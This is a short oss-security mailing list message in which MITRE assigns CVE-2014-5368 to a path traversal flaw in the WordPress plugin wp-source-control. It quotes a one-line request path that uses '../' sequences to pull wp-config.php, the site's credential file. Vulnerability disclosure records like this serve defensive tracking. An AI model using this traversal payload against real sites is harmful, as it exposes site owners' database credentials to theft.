Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Wed, 20 Aug 2014 04:14:28 -0400 (EDT)
From: cve-assign@...re.org
To: henri@...v.fi
Cc: cve-assign@...re.org, oss-security@...ts.openwall.com
Subject: Re: CVE request: WordPress plugin wp-source-control remote path traversal file access

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

> downloadfiles/download.php?path=../../../../wp-config.php

Use CVE-2014-5368.

- -- 
CVE assignment team, MITRE CVE Numbering Authority
M/S M300
202 Burlington Road, Bedford, MA 01730 USA
[ PGP key available through http://cve.mitre.org/cve/request_id.html ]
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.14 (SunOS)

iQEcBAEBAgAGBQJT9FhvAAoJEKllVAevmvmsIs8IALADGGS6A9WyVihZvNDf/x41
99l5eT+p0HQ5KryOnHPfYWsl1JR9658y7p9kHOWrbrAzUq/hYp7nNPKwIXxQWdfI
0Z6z1pJ3CgU/23j9TPT88Dlw4zBLBsA+Kas1iJJHJj/J1eJtx9PQQLrZpo1OhfhS
kk6zS/UdbnscyItEiUwZQ6XD8Q3FJZi9OqNMsq4rerdqHdI/b2PAjiTvk8isI8Zp
k6U1kknZUmM7fjqqSqQU5ve/rNuKkJP3NHBDUmf6U3AgANFw2NujhGlJGITKddYl
zcvtWcDtdNrrqw6JrEoF92KeKXxi6aPOJ7uPZYTEH7hMo4CqKEuXH7gB0f5Vmwg=
=LaED
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.